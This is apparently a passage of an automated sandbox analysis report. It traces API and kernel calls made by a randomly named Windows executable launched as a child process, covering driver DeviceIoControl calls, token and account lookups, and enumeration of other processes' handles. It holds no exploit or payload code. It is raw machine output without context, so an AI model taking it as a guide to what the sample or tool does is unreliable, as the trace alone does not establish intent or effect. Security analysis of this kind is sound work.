Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0162.788] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x25 [0162.788] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80034f1d40 | out: TokenHandle=0xfffffa80034f1d40*=0xc4) returned 0x0 [0162.788] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0162.788] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.788] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.788] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.790] CloseHandle (hObject=0xc4) returned 1 [0162.790] CloseHandle (hObject=0xc8) returned 1 [0162.790] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.790] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0162.790] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.790] PsAcquireProcessExitSynchronization () returned 0x0 [0162.790] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880051635d0) [0162.790] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002147c20, HandleInformation=0x0) returned 0x0 [0162.790] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.790] PsReleaseProcessExitSynchronization () returned 0x2 [0162.790] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x23 [0162.790] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022ef044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022ef044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.790] ObfDereferenceObject (Object=0xfffffa8002147c20) returned 0x1 [0162.790] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.790] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.790] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.790] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0162.791] PsLookupProcessByProcessId (in: ProcessId=0x304, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.791] PsAcquireProcessExitSynchronization () returned 0x0 [0162.791] KeStackAttachProcess (in: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80026627f0, ApcState=0xfffff880051635d0) [0162.791] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80026a1be0, HandleInformation=0x0) returned 0x0 [0162.791] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.791] PsReleaseProcessExitSynchronization () returned 0x2 [0162.791] ObfDereferenceObject (Object=0xfffffa80026627f0) returned 0x23 [0162.791] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80022f0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022f0044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.791] ObfDereferenceObject (Object=0xfffffa80026a1be0) returned 0x1 [0162.791] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.791] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a4) returned 0x0 [0162.791] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.791] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.791] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.791] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.791] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.791] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.791] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.791] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.791] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.791] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.791] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.791] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.791] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.791] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.792] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.792] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.792] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.792] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.792] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.792] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7b0) returned 0xc8 [0162.792] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.792] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800268b440, HandleInformation=0x0) returned 0x0 [0162.792] ObOpenObjectByPointer (in: Object=0xfffffa800268b440, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0162.792] ObfDereferenceObject (Object=0xfffffa800268b440) returned 0xf [0162.792] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80034f1d40 | out: TokenHandle=0xfffffa80034f1d40*=0xc4) returned 0x0 [0162.792] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0162.792] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.792] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.792] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.794] CloseHandle (hObject=0xc4) returned 1 [0162.794] CloseHandle (hObject=0xc8) returned 1 [0162.794] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.794] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0162.795] PsLookupProcessByProcessId (in: ProcessId=0x7b0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.795] PsAcquireProcessExitSynchronization () returned 0x0 [0162.795] KeStackAttachProcess (in: PROCESS=0xfffffa800268b440, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800268b440, ApcState=0xfffff880051635d0) [0162.795] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002625630, HandleInformation=0x0) returned 0x0 [0162.795] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.795] PsReleaseProcessExitSynchronization () returned 0x2 [0162.795] ObfDereferenceObject (Object=0xfffffa800268b440) returned 0xd [0162.795] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022f5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022f5044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.795] ObfDereferenceObject (Object=0xfffffa8002625630) returned 0x1 [0162.795] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.795] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.795] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.795] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0162.795] PsLookupProcessByProcessId (in: ProcessId=0x7b0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.795] PsAcquireProcessExitSynchronization () returned 0x0 [0162.795] KeStackAttachProcess (in: PROCESS=0xfffffa800268b440, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800268b440, ApcState=0xfffff880051635d0) [0162.795] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002556070, HandleInformation=0x0) returned 0x0 [0162.795] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.795] PsReleaseProcessExitSynchronization () returned 0x2 [0162.795] ObfDereferenceObject (Object=0xfffffa800268b440) returned 0xd [0162.795] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022f6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022f6044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.795] ObfDereferenceObject (Object=0xfffffa8002556070) returned 0x1 [0162.795] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.795] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x340) returned 0x0 [0162.796] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.796] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.796] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.796] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.796] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.796] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.796] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.796] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.796] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.796] PsLookupProcessByProcessId (in: ProcessId=0x340, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.796] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.796] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x67c) returned 0xc8 [0162.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.796] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80025564f0, HandleInformation=0x0) returned 0x0 [0162.797] ObOpenObjectByPointer (in: Object=0xfffffa80025564f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0162.797] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0x20 [0162.797] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80034f1d40 | out: TokenHandle=0xfffffa80034f1d40*=0xc4) returned 0x0 [0162.797] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0162.797] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.797] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.797] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0163.265] CloseHandle (hObject=0xc4) returned 1 [0163.265] CloseHandle (hObject=0xc8) returned 1 [0163.265] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0163.265] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0163.265] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0163.265] PsAcquireProcessExitSynchronization () returned 0x0 [0163.265] KeStackAttachProcess (in: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0) [0163.265] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa1f20, HandleInformation=0x0) returned 0x0 [0163.265] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0163.265] PsReleaseProcessExitSynchronization () returned 0x2 [0163.265] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0x1e [0163.265] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80025d87c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80025d87c4, ReturnLength=0xfffff88005163508) returned 0x0 [0163.265] ObfDereferenceObject (Object=0xfffffa8001fa1f20) returned 0x1 [0163.265] IofCompleteRequest (Irp=0xfffffa8002989340, PriorityBoost=0) [0163.266] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0163.266] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0163.266] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0163.266] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0163.266] PsAcquireProcessExitSynchronization () returned 0x0 [0163.266] KeStackAttachProcess (in: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025564f0, ApcState=0xfffff880051635d0) [0163.266] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa1850, HandleInformation=0x0) returned 0x0 [0163.266] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0163.266] PsReleaseProcessExitSynchronization () returned 0x2 [0163.266] ObfDereferenceObject (Object=0xfffffa80025564f0) returned 0x1e [0163.266] ObQueryNameString (in: Object=0xfffffa8001fa1850, ObjectNameInfo=0xfffffa80022df044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022df044, ReturnLength=0xfffff88005163550) returned 0x0 [0163.266] ObfDereferenceObject (Object=0xfffffa8001fa1850) returned 0x1 [0163.266] IofCompleteRequest (Irp=0xfffffa8002989340, PriorityBoost=0) [0163.266] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0163.267] GetVersion () returned 0x1db10106 [0163.267] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4 [0163.267] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4, lpConsoleScreenBufferInfo=0x12fec0 | out: lpConsoleScreenBufferInfo=0x12fec0) returned 0 [0163.280] WriteFile (in: hFile=0x4, lpBuffer=0x12e900*, nNumberOfBytesToWrite=0x20e, lpNumberOfBytesWritten=0x12e220, lpOverlapped=0x0 | out: lpBuffer=0x12e900*, lpNumberOfBytesWritten=0x12e220*=0x20e, lpOverlapped=0x0) returned 1 [0163.283] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2b0080 | out: hHeap=0x290000) returned 1 [0163.283] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x12feb8 | out: phModule=0x12feb8) returned 0 [0163.284] RtlExitUserProcess (ExitCode=0x0) [0163.285] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2af050 | out: hHeap=0x290000) returned 1 [0163.300] IofCompleteRequest (Irp=0xfffffa8002989340, PriorityBoost=0) Thread: id = 53 os_tid = 0xb24 Process: id = "28" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x38be3000" os_pid = "0x90c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x9bc" cmd_line = "tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 49 os_tid = 0x98c [0096.697] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0096.703] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0096.703] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0096.703] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0096.703] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0096.703] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0096.704] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0096.704] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0096.704] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0096.704] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0097.239] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0097.239] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0097.239] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0097.239] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0097.239] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0097.240] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0097.240] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0097.240] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0097.240] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0097.240] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0097.240] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0097.241] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0097.241] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0097.241] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0097.241] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0097.241] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0097.241] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0097.242] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0097.242] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0097.242] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0097.242] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0097.242] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0097.243] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0097.243] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0097.243] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0097.243] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0097.243] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0097.243] GetProcAddress 